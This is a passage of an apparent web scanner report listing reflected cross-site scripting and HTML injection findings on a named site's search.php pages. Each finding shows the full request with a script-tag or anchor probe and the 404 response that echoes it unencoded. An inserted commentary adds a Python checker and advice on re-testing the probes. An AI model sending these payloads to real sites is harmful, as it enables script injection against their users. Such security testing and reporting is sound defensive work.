Date: Wed, 17 Nov 2010 23:17:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos24fe5<script>alert(1)</script>6d46f3c6cb4/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1356. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f65e<script>alert(1)</script>b8b946abcbb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images5f65e<script>alert(1)</script>b8b946abcbb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images5f65e<script>alert(1)</script>b8b946abcbb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1357. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 60741<script>alert(1)</script>8b758a0be77 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/search.php60741<script>alert(1)</script>8b758a0be77?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php60741<script>alert(1)</script>8b758a0be77?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1358. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d4b41<a>c699ba2cb48 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd4b41<a>c699ba2cb48&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd4b41<a>c699ba2cb48&opt=2 was not found on this server.</p>
...[SNIP]...

2.1359. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1e42d<a>956136fb28d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...1e42d<a>956136fb28d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...1e42d<a>956136fb28d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1360. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6850<script>alert(1)</script>8f9aad5540b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6850<script>alert(1)</script>8f9aad5540b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6850<script>alert(1)</script>8f9aad5540b=1 was not found on this server.</p>
...[SNIP]...

2.1361. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 64011<a>319301170f3 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=264011<a>319301170f3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=264011<a>319301170f3 was not found on this server.</p>
...[SNIP]...

2.1362. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f64d6<script>alert(1)</script>6fab8b37a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf64d6<script>alert(1)</script>6fab8b37a93/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf64d6<script>alert(1)</script>6fab8b37a93/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1363. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5b46<script>alert(1)</script>c8b0142af2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16d5b46<script>alert(1)</script>c8b0142af2d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16d5b46<script>alert(1)</script>c8b0142af2d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1364. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5b6c<script>alert(1)</script>c2166fc3929 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themese5b6c<script>alert(1)</script>c2166fc3929/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themese5b6c<script>alert(1)</script>c2166fc3929/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1365. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d6d5<script>alert(1)</script>e86c5622130 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos4d6d5<script>alert(1)</script>e86c5622130/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos4d6d5<script>alert(1)</script>e86c5622130/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1366. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b7d16<script>alert(1)</script>1bc4179b861 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/search.phpb7d16<script>alert(1)</script>1bc4179b861?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.phpb7d16<script>alert(1)</script>1bc4179b861?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1367. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 5dad5<a>be2f3ae7b98 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search5dad5<a>be2f3ae7b98&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search5dad5<a>be2f3ae7b98&opt=2 was not found on this server.</p>
...[SNIP]...
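The findings in this section (2.1363 onward) all share one sink: the 404 page echoes the full request target, path and query string alike, inside a <p> element with no encoding, which is why a probe placed in any path segment, any query value, or even a parameter name comes back intact. The report rates the <script> reflections "Certain" and the bare <a> reflections "Firm". The following Python is an added example, not part of the scanner report or the site's code: it extracts the scanner's bracketed probe from a recorded request line, models the observed 404 behaviour beside a hardened version that HTML-encodes the target, and reproduces the two confidence levels from the response body. The function and constant names are mine, and the vulnerable_not_found_body() routine is an assumed reconstruction of the output shown above, not the site's actual handler.

```python
import html
import re
from typing import Optional

# Constructed inputs shaped like the report's own probes: the scanner
# brackets each payload with 5 and 11 hex characters so it can locate the
# reflection. These mirror finding 2.1363 (script tag) and 2.1367 (bare <a>).
CERTAIN_PAYLOAD = "d5b46<script>alert(1)</script>c8b0142af2d"
FIRM_PAYLOAD = "5dad5<a>be2f3ae7b98"

# Scanner marker pattern: 5 hex chars, a tag, anything, then 11 hex chars.
PAYLOAD_RE = re.compile(r"[0-9a-f]{5}<[^>]*>.*?[0-9a-f]{11}")
# Opening tags only; </script> does not match because '/' is not a letter.
TAG_RE = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")


def extract_payload(request_line: str) -> Optional[str]:
    """Pull the bracketed probe out of a request line like those recorded
    in the report; None when no probe is present."""
    m = PAYLOAD_RE.search(request_line)
    return m.group(0) if m else None


def vulnerable_not_found_body(request_target: str) -> str:
    """Assumed reconstruction (not the site's code) of what the report shows:
    the raw request target is concatenated into a text node unencoded."""
    return (f"<p>The requested URL {request_target} "
            "was not found on this server.</p>")


def hardened_not_found_body(request_target: str) -> str:
    """Same page with the target HTML-encoded for its text context.
    The PHP equivalent is htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES)."""
    return (f"<p>The requested URL {html.escape(request_target, quote=True)} "
            "was not found on this server.</p>")


def classify_reflection(payload: str, body: str) -> str:
    """Reproduce the scanner's confidence levels from a response body:
    'certain' - payload reflected verbatim and carries a <script> tag;
    'firm'    - reflected verbatim with some other tag (HTML injection
                shown, JavaScript execution not yet demonstrated);
    'encoded' - only the HTML-escaped form is present (safe in this context);
    'absent'  - not reflected at all."""
    if payload in body:
        tags = {t.lower() for t in TAG_RE.findall(payload)}
        return "certain" if "script" in tags else "firm"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def check_finding(payload: str, target_template: str) -> dict:
    """Render both 404 bodies for a request target ({p} marks the injection
    point) and classify the reflection in each."""
    target = target_template.format(p=payload)
    return {
        "vulnerable": classify_reflection(payload, vulnerable_not_found_body(target)),
        "hardened": classify_reflection(payload, hardened_not_found_body(target)),
    }


if __name__ == "__main__":
    line = ("GET /detail/16d5b46<script>alert(1)</script>c8b0142af2d/themes/"
            "kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1")
    print(extract_payload(line))
    print(check_finding(CERTAIN_PAYLOAD,
                        "/detail/16{p}/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2"))
    print(check_finding(FIRM_PAYLOAD,
                        "/detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search{p}&opt=2"))
```

Two caveats when reading the ratings above. First, the scanner sent literal < and > characters in the request target; a link delivered through a modern browser will percent-encode those in the path, so before treating a path-segment reflection as exploitable via a crafted URL, re-send the probe as %3Cscript%3E and confirm the handler decodes it before echoing. Second, the response snippets for the "Firm" findings (Submit3, keyword, opt) show exactly the same sink as the "Certain" ones, so they are worth re-testing by hand with the script-tag probe, as the report itself recommends.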

2.1368. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8765f<a>1e05f89c8ef was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...8765f<a>1e05f89c8ef&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...8765f<a>1e05f89c8ef&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1369. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5f3b9<script>alert(1)</script>085331967fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5f3b9<script>alert(1)</script>085331967fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5f3b9<script>alert(1)</script>085331967fa=1 was not found on this server.</p>
...[SNIP]...

2.1370. http://www.resellerbase.com/detail/16/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec9c1<a>4c61b6de10e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ec9c1<a>4c61b6de10e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2ec9c1<a>4c61b6de10e was not found on this server.</p>
...[SNIP]...

2.1371. http://www.resellerbase.com/detail/16/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f834<script>alert(1)</script>ba55b2bcc29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

